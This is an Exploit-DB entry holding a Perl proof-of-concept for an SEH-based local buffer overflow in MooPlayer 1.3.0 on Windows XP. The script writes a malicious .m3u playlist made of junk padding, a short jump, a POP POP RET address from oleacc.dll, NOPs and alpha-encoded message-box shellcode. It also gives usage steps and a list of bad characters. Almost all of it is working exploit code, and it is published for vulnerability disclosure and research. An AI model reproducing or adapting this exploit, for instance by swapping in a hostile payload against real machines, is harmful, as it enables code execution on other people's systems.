MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)

EDB-ID:

36819

CVE:





Platform:

Windows

Date:

2015-04-22


#!/usr/bin/perl

###########################################################################=
#################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
###########################################################################=
#################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
###########################################################################=
#################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)
# available and could be used, which would make the exploit work across multiple OS
# versions, but the shellcode space would be limited since \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
###########################################################################=
#################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
###########################################################################=
#################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
# file) -> Open
# OR drag and drop created exploit file into MooPlayer
###########################################################################=
#################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
###########################################################################=
#################################


$file = "MooPlayer_messagebox.m3u";

my $junk = "A" x 264;
my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes
my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)
my $NOPs = "\x90" x 100;

# msfpayload windows/messagebox
# msfencode -e x86/alpha_upper
my $shellcode =
"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
"\x4f\x50\x55\x45\x58\x41\x41";

# keep the exploit length consistent
my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));

open(myfile,">$file") ;
print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;